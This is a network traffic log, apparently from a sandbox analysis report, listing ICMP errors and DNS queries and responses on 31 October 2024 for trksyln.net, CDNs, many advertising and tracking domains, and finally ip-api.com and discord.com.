                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.808166981 CET192.168.2.41.1.1.1c250(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.653559923 CET192.168.2.41.1.1.1c1fe(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.375380039 CET192.168.2.41.1.1.1c267(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.580025911 CET192.168.2.41.1.1.10xfac4Standard query (0)www.trksyln.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.580267906 CET192.168.2.41.1.1.10x55edStandard query (0)www.trksyln.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.649210930 CET192.168.2.41.1.1.10xc04cStandard query (0)trksyln.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.649547100 CET192.168.2.41.1.1.10xe329Standard query (0)trksyln.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.427733898 CET192.168.2.41.1.1.10x8106Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.427917004 CET192.168.2.41.1.1.10x2002Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.106627941 CET192.168.2.41.1.1.10x9f14Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.107126951 CET192.168.2.41.1.1.10x75c9Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.107896090 CET192.168.2.41.1.1.10x6f25Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.108364105 CET192.168.2.41.1.1.10xca2eStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.108922005 CET192.168.2.41.1.1.10x41c6Standard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.109488010 CET192.168.2.41.1.1.10xc054Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.291361094 CET192.168.2.41.1.1.10x40c7Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.291982889 CET192.168.2.41.1.1.10x518dStandard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.304461956 CET192.168.2.41.1.1.10xc500Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.304599047 CET192.168.2.41.1.1.10x2919Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.012743950 CET192.168.2.41.1.1.10x12d4Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.013465881 CET192.168.2.41.1.1.10xf165Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.060787916 CET192.168.2.41.1.1.10xeb33Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.061096907 CET192.168.2.41.1.1.10x5100Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.486825943 CET192.168.2.41.1.1.10x9feaStandard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.486972094 CET192.168.2.41.1.1.10xb744Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.488500118 CET192.168.2.41.1.1.10xa3ebStandard query (0)a.fsdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.488646984 CET192.168.2.41.1.1.10x9e6bStandard query (0)a.fsdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.489399910 CET192.168.2.41.1.1.10x5258Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.489571095 CET192.168.2.41.1.1.10x82ccStandard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.490055084 CET192.168.2.41.1.1.10xad59Standard query (0)fundingchoicesmessages.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.490184069 CET192.168.2.41.1.1.10x2468Standard query (0)fundingchoicesmessages.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.952150106 CET192.168.2.41.1.1.10x8c76Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.952378035 CET192.168.2.41.1.1.10x1786Standard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.895286083 CET192.168.2.41.1.1.10x2545Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.895876884 CET192.168.2.41.1.1.10xef95Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.237696886 CET192.168.2.41.1.1.10xb8c3Standard query (0)trksyln.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.237880945 CET192.168.2.41.1.1.10xdaafStandard query (0)trksyln.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.307513952 CET192.168.2.41.1.1.10xc163Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.307661057 CET192.168.2.41.1.1.10x905Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.325536013 CET192.168.2.41.1.1.10xf3e7Standard query (0)a.fsdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.325750113 CET192.168.2.41.1.1.10x6df1Standard query (0)a.fsdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.326827049 CET192.168.2.41.1.1.10xff1dStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.326971054 CET192.168.2.41.1.1.10xb1b9Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.328980923 CET192.168.2.41.1.1.10x2804Standard query (0)fundingchoicesmessages.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.329194069 CET192.168.2.41.1.1.10xa1afStandard query (0)fundingchoicesmessages.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.777069092 CET192.168.2.41.1.1.10x2e5bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.777209044 CET192.168.2.41.1.1.10xac0aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.217365026 CET192.168.2.41.1.1.10xbf0aStandard query (0)um.simpli.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.217519045 CET192.168.2.41.1.1.10xd2efStandard query (0)um.simpli.fi65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218015909 CET192.168.2.41.1.1.10x381Standard query (0)sync.ipredictive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218323946 CET192.168.2.41.1.1.10x9b04Standard query (0)sync.ipredictive.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218797922 CET192.168.2.41.1.1.10x7c1Standard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218923092 CET192.168.2.41.1.1.10x7b22Standard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.219387054 CET192.168.2.41.1.1.10x9290Standard query (0)s.uuidksinc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.219748020 CET192.168.2.41.1.1.10xe633Standard query (0)s.uuidksinc.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.220428944 CET192.168.2.41.1.1.10x6db5Standard query (0)dsp.adkernel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.220576048 CET192.168.2.41.1.1.10x7658Standard query (0)dsp.adkernel.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.220983982 CET192.168.2.41.1.1.10xaafcStandard query (0)bh.contextweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.222795963 CET192.168.2.41.1.1.10xb54aStandard query (0)bh.contextweb.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.223330975 CET192.168.2.41.1.1.10x24bcStandard query (0)www.temu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.223834038 CET192.168.2.41.1.1.10xb4b9Standard query (0)www.temu.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.224870920 CET192.168.2.41.1.1.10x10e6Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225284100 CET192.168.2.41.1.1.10xe466Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.350243092 CET192.168.2.41.1.1.10x6bcbStandard query (0)dclk-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.350389957 CET192.168.2.41.1.1.10xa329Standard query (0)dclk-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.350862980 CET192.168.2.41.1.1.10xb353Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.351027966 CET192.168.2.41.1.1.10xe18aStandard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.351450920 CET192.168.2.41.1.1.10x72ebStandard query (0)a.c.appier.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.351577044 CET192.168.2.41.1.1.10xdd98Standard query (0)a.c.appier.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.352125883 CET192.168.2.41.1.1.10x44a7Standard query (0)match.prod.bidr.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.352399111 CET192.168.2.41.1.1.10x9d1bStandard query (0)match.prod.bidr.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.353221893 CET192.168.2.41.1.1.10x8b78Standard query (0)sync.srv.stackadapt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.353646040 CET192.168.2.41.1.1.10xa970Standard query (0)sync.srv.stackadapt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.354623079 CET192.168.2.41.1.1.10xdf9eStandard query (0)sync2-dsp.e-volution.aiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.354747057 CET192.168.2.41.1.1.10x70b0Standard query (0)sync2-dsp.e-volution.ai65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.425930977 CET192.168.2.41.1.1.10xb1aStandard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.426455975 CET192.168.2.41.1.1.10xcde0Standard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.426795959 CET192.168.2.41.1.1.10x5226Standard query (0)pr-bh.ybp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.427050114 CET192.168.2.41.1.1.10x3dd8Standard query (0)pr-bh.ybp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.431770086 CET192.168.2.41.1.1.10x3998Standard query (0)dis.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.431996107 CET192.168.2.41.1.1.10x2e06Standard query (0)dis.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437947035 CET192.168.2.41.1.1.10x3a2bStandard query (0)gtrace.mediago.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438236952 CET192.168.2.41.1.1.10x4d09Standard query (0)gtrace.mediago.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.534204960 CET192.168.2.41.1.1.10x6d0dStandard query (0)ads.travelaudience.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.534476042 CET192.168.2.41.1.1.10xcda8Standard query (0)ads.travelaudience.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.542999029 CET192.168.2.41.1.1.10x8f6dStandard query (0)onetag-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.543137074 CET192.168.2.41.1.1.10x64adStandard query (0)onetag-sys.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.816457033 CET192.168.2.41.1.1.10xbfd3Standard query (0)widget.us.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.816703081 CET192.168.2.41.1.1.10xf51Standard query (0)widget.us.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.642309904 CET192.168.2.41.1.1.10x1653Standard query (0)ep1.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.642309904 CET192.168.2.41.1.1.10x5169Standard query (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.715224981 CET192.168.2.41.1.1.10x7d85Standard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.715365887 CET192.168.2.41.1.1.10xd1eaStandard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.026063919 CET192.168.2.41.1.1.10x10c8Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.026256084 CET192.168.2.41.1.1.10xd3d3Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.027798891 CET192.168.2.41.1.1.10xae1aStandard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.028063059 CET192.168.2.41.1.1.10x32a2Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.095069885 CET192.168.2.41.1.1.10x6794Standard query (0)widget.us.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.095362902 CET192.168.2.41.1.1.10x9d30Standard query (0)widget.us.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.175508976 CET192.168.2.41.1.1.10xfa22Standard query (0)ep2.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.175642014 CET192.168.2.41.1.1.10xaeccStandard query (0)ep2.adtrafficquality.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.150079012 CET192.168.2.41.1.1.10x727dStandard query (0)ep1.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.150293112 CET192.168.2.41.1.1.10xc795Standard query (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.760759115 CET192.168.2.41.1.1.10x5eb1Standard query (0)ep2.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.763109922 CET192.168.2.41.1.1.10x3a28Standard query (0)ep2.adtrafficquality.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:45.170942068 CET192.168.2.41.1.1.10xa1a1Standard query (0)ep2.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:45.171152115 CET192.168.2.41.1.1.10x30c7Standard query (0)ep2.adtrafficquality.google65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:54.957349062 CET192.168.2.41.1.1.10xcc65Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.110932112 CET192.168.2.41.1.1.10x445fStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.621695042 CET1.1.1.1192.168.2.40xfac4No error (0)www.trksyln.nettrksyln.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.621695042 CET1.1.1.1192.168.2.40xfac4No error (0)trksyln.net160.153.155.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.808095932 CET1.1.1.1192.168.2.40x55edNo error (0)www.trksyln.nettrksyln.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.714517117 CET1.1.1.1192.168.2.40xc04cNo error (0)trksyln.net160.153.155.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.671129942 CET1.1.1.1192.168.2.40x2002No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.671149969 CET1.1.1.1192.168.2.40x8106No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.113415956 CET1.1.1.1192.168.2.40x9f14No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.113415956 CET1.1.1.1192.168.2.40x9f14No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.113415956 CET1.1.1.1192.168.2.40x9f14No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.113415956 CET1.1.1.1192.168.2.40x9f14No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.113415956 CET1.1.1.1192.168.2.40x9f14No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114166975 CET1.1.1.1192.168.2.40x75c9No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114619017 CET1.1.1.1192.168.2.40x6f25No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114619017 CET1.1.1.1192.168.2.40x6f25No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114619017 CET1.1.1.1192.168.2.40x6f25No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114619017 CET1.1.1.1192.168.2.40x6f25No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.115479946 CET1.1.1.1192.168.2.40x41c6No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.116142988 CET1.1.1.1192.168.2.40xc054No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.299998999 CET1.1.1.1192.168.2.40x518dNo error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.304928064 CET1.1.1.1192.168.2.40x40c7No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.311299086 CET1.1.1.1192.168.2.40x2919No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.311322927 CET1.1.1.1192.168.2.40xc500No error (0)googleads.g.doubleclick.net142.250.184.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.020520926 CET1.1.1.1192.168.2.40x12d4No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.020520926 CET1.1.1.1192.168.2.40x12d4No error (0)analytics-alv.google.com216.239.34.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.020520926 CET1.1.1.1192.168.2.40x12d4No error (0)analytics-alv.google.com216.239.32.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.020520926 CET1.1.1.1192.168.2.40x12d4No error (0)analytics-alv.google.com216.239.38.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.020520926 CET1.1.1.1192.168.2.40x12d4No error (0)analytics-alv.google.com216.239.36.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.067806005 CET1.1.1.1192.168.2.40xeb33No error (0)td.doubleclick.net172.217.18.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.493745089 CET1.1.1.1192.168.2.40x9feaNo error (0)stats.g.doubleclick.net64.233.167.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.493745089 CET1.1.1.1192.168.2.40x9feaNo error (0)stats.g.doubleclick.net64.233.167.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.493745089 CET1.1.1.1192.168.2.40x9feaNo error (0)stats.g.doubleclick.net64.233.167.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.493745089 CET1.1.1.1192.168.2.40x9feaNo error (0)stats.g.doubleclick.net64.233.167.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.496603012 CET1.1.1.1192.168.2.40x5258No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.496891975 CET1.1.1.1192.168.2.40xad59No error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.496891975 CET1.1.1.1192.168.2.40xad59No error (0)www3.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497046947 CET1.1.1.1192.168.2.40xa3ebNo error (0)a.fsdn.coma.fsdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497433901 CET1.1.1.1192.168.2.40x2468No error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497450113 CET1.1.1.1192.168.2.40x9e6bNo error (0)a.fsdn.coma.fsdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.958705902 CET1.1.1.1192.168.2.40x8c76No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.959675074 CET1.1.1.1192.168.2.40x1786No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.135073900 CET1.1.1.1192.168.2.40x2545No error (0)googleads.g.doubleclick.net142.250.184.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.135421038 CET1.1.1.1192.168.2.40xef95No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.297065020 CET1.1.1.1192.168.2.40xb8c3No error (0)trksyln.net160.153.155.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.314549923 CET1.1.1.1192.168.2.40x905No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.318711042 CET1.1.1.1192.168.2.40xc163No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.318711042 CET1.1.1.1192.168.2.40xc163No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.318711042 CET1.1.1.1192.168.2.40xc163No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.318711042 CET1.1.1.1192.168.2.40xc163No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.318711042 CET1.1.1.1192.168.2.40xc163No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
